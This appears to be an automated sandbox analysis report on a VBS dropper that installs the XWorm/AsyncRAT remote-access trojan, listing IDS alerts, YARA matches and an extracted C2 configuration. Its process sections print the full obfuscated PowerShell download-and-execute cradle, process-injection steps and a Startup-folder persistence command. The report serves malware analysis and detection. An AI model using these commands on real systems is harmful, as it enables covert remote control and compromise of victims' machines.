| 2024-09-25T15:27:48.920023+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:26:56.221499+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |


                AV Detection

Source: https://paste.ee/d/Sk1Jg/0; Avira URL Cloud: Label: malware
Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt; Avira URL Cloud: Label: malware
Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack; String decryptor: 135.224.23.113
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack; String decryptor: 5555
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack; String decryptor: <123456789>
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack; String decryptor: <Xwormmm>
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack; String decryptor: XWorm V5.6
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack; String decryptor: USB.exe
Source: unknown; HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.1704495175.000001691101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp

                Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

Source: Network traffic; Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 135.224.23.113:5555 -> 192.168.2.9:49709
Source: Network traffic; Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 135.224.23.113:5555 -> 192.168.2.9:49709
Source: Network traffic; Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49709 -> 135.224.23.113:5555
Source: Network traffic; Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49709 -> 135.224.23.113:5555
Source: Network traffic; Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.9:49708 -> 188.114.96.3:443
Source: Network traffic; Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.9:49708
Source: Malware configuration extractor; URLs: 135.224.23.113
Source: unknown; DNS query: name: paste.ee
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: Yara match; File source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.9:49709 -> 135.224.23.113:5555
Source: global traffic; HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1; Host: ia600100.us.archive.org; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /d/Sk1Jg/0 HTTP/1.1; Host: paste.ee; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 188.114.96.3
Source: Joe Sandbox View; IP Address: 207.241.227.240
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: LUCENT-CIOUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; TCP traffic detected without corresponding DNS query: 135.224.23.113
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 identical entries in the report)
Source: global traffic | HTTP traffic detected:
    GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
    Host: ia600100.us.archive.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /d/Sk1Jg/0 HTTP/1.1
    Host: paste.ee
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
Source: global traffic | DNS traffic detected: DNS query: paste.ee
Source: powershell.exe, 00000009.00000002.1729309445.00000169798D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsofth
Source: powershell.exe, 00000009.00000002.1675423746.0000016901679000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ia600100.us.archive.org
Source: powershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1513504661.000001618009B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1513504661.000001618001B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.1513504661.0000016180069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B00062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1675423746.000001690100E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.arX
Source: powershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org
Source: powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.000001690100E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Source: powershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/Sk1Jg/0
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49708 version: TLS 1.2

System Summary

Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF886D13292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF887A20DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01616348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_016184B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01615670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_0161AC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01615328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01610BA0
Source: wm.vbs | Initial sample: Strings found which are bigger than 50
Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@15/8@2/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\mR0UgXYus56nykvx
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gs4dr5x.1ht.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
